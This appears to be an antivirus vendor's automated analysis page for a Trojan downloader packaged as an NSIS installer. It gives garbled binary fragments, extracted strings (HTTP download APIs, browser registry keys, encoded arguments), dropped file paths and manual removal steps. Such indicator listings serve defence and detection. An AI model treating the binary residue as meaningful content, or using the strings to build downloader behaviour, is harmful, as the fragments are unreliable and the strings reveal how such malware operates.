.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
..PC.......D...z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....<<< skipped >>>
The Trojan connects to the servers at the folowing location(s):
.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
hXXp://nsis.sf.net/NSIS_Error
... %d%%
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\beeiheibdh.exe 6,9,2,9,8,0,5,5,5,1,4 KUdHOzU3ListHytNTEBHQUQ4KxsuSj9LVUZKS0Q/OC8cKTtHSkxJPzgsNC4wLh4mO0k/OCsfK0pJTTtNQ09aREM5LDAvLhgvTkBNVUFMVlNJRD1jb29vNikmcWluLj9ATkopTkZOJDlQSylETUJJFy06REk RkRDOXAvK0FXbS4 dENna2VkSTlvXHB1bFsxOV87MHhNUWY4aUFQcF9ESUFUY1BPQl83QkRnM2tIOEVcKE1wXHI9amA4NUVac2dpblRidHlAU0xpall3al0ocHJJZVNsUTZSaV5gX25xczkxcGdmLDFMTFxfamF6Z0dEakwwZDYtaVUuTUAzb01rUFkoWENmaElgS0pXLi11ZFQ9L1VGOXBWcThKPjJXYlJkeGZENFAwZUZoYlpYQlBKUVFwaXNeQy5sUiAqPyw8LjIpMykYLz8tOCwtGiZCKjUtLBsqQzA3JC8XJ0QwOCgwHClHUEY8VT5PWk9OQ00/OlE9GypLUUs TEFLV0VQRzw8HClHUEY8VT5PWk09Rzw7FydFU0BaVE5GNB4mPVhAWj5MQEZATDw1ICpDSlJQWTlQRk9TQE04LxwpS0Y4RktUSlBeUUxDOxcnVkg4LR8rPkovNBgvTVBJU0VHPF1OPUw SkhERUc4RTxNUkc4Gy5FTVZQTEZUREhAPHBsbGMXJ1JAT1BRSkNFRVZNU0BNWkM9U0o7KRgvQ0Q/RFQ3KB4mQVNaP1RNPUdAQVY9Tj5NVE9QPzs7XVlsbmAbLkBJTkxDR0E/WkRPOSsvNyUpMi4pLC8xKCk3FydQPE08S0g/Q11ARlNPPEdLOW5pc1wYL09ESEQ5KysyLy81MjQzMxwpO01ORkxKPD9eUENEQzQpMSotNC4uKigzISkyNS8xOS4uIT9E
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
beeiheibdh.exe
7,7074787
9Ÿ:X:
393C3
7 7t7>7
?%?*?/?4?=?
3 3$30383
7 7$7(7,70747
Certification Services Division1806
hXXp://t2.symcb.com0
!hXXp://t1.symcb.com/ThawtePCA.crl0
hXXp://tl.symcb.com/tl.crl0
hXXps://VVV.thawte.com/cps0/
!hXXps://VVV.thawte.com/repository0
hXXp://tl.symcd.com0&
hXXp://tl.symcb.com/tl.crt0
.?AV?$CAtlExeModuleT@VCSmartInstallerModule@@@ATL@@
.?AVCWebPage@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
zcÁ
c:\%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>{8856F961-340A-11D0-A96B-00C04FD705A2}00000000
9668.151129.1376.2444
beeiheibdh.exe_320:
.text
`.rdata
@.data
.rsrc
@.reloc
tCPjB
<1%uMj
r%f;M
j.Yf;
_tcPVj@
.PjRW
X:X:X:X:X:X
%d/%d/%d %d:%d:%d
Error %u in WinHttpQueryDataAvailable.
Error %u in WinHttpReadData.
Error %d has occurred.
F%D,3
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
WinHttpCrackUrl
WinHttpOpen
WinHttpCloseHandle
WinHttpConnect
WinHttpReadData
WinHttpWriteData
WinHttpQueryDataAvailable
WinHttpSetOption
WinHttpSetTimeouts
WinHttpOpenRequest
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpGetProxyForUrl
WinHttpGetIEProxyConfigForCurrentUser
WINHTTP.dll
GetProcessHeap
KERNEL32.dll
CreateDialogIndirectParamW
USER32.dll
GDI32.dll
RegCloseKey
RegCreateKeyExW
RegEnumKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
ole32.dll
OLEAUT32.dll
URLDownloadToFileW
urlmon.dll
IPHLPAPI.DLL
GetCPInfo
zcÁ
.?AV?$CAtlExeModuleT@VCSmartInstallerModule@@@ATL@@
.?AVCWebPage@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
7,7074787
9Ÿ:X:
393C3
7 7t7>7
?%?*?/?4?=?
3 3$30383
7 7$7(7,70747
SktAKlNMSg==
SkhOKlNMSg==
P1FAKlNMSg==
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19
\default.html
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
firefox
chrome
opera
Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice
ChromeHTML
FirefoxHTML
IE.AssocFile.HTM
Opera.HTML
http\shell\open\command
Opera.exe
Safari.exe
SOFTWARE\Mozilla\Mozilla FireFox
Software\Mozilla\Mozilla FireFox
SOFTWARE\Google\Update\Clients\{8A69D345-D564-463c-AFF1-A69D9E530F96}@@exeurl
6-7-5-7-0-8-8-0-9-2-5
ExeURL2
RegKey
ReportName
PreExe
PostExe
RegKey64
AntivirusesRegKeys
PreExeResultTerm
PreExeResultValue
PostExeResultTerm
PostExeResultValue
PostRegKey32
PostRegKey64
RegKey32
WinHttpClient
n2d.exe
downoad.exe
Hmscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
portuguese-brazilian
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\beeiheibdh.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
wmic.exe:224
SktAKlNMSg==29820.exe:1948
%original file name%.exe:1832
SktAKlNMSg==10700.exe:1016 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\81449533620.txt (238 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IKPZAXUL\OperaChecker25-6[1].exe (8606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHC78LGB\button[1].png (458 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1QF6BIV\dc[1].js (1327 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9XALHNJO\XPLimitChecker[1].exe (7051 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHC78LGB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9XALHNJO\button_over[1].png (921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IKPZAXUL\bodyImg[1].png (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IKPZAXUL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\9XALHNJO\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y1QF6BIV\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IHC78LGB\DynamicOfferScreen[1].htm (2083 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81449533620\SktAKlNMSg==10700.exe (50 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\81449533620\SktAKlNMSg==29820.exe (1039 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\beeiheibdh.exe (17585 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.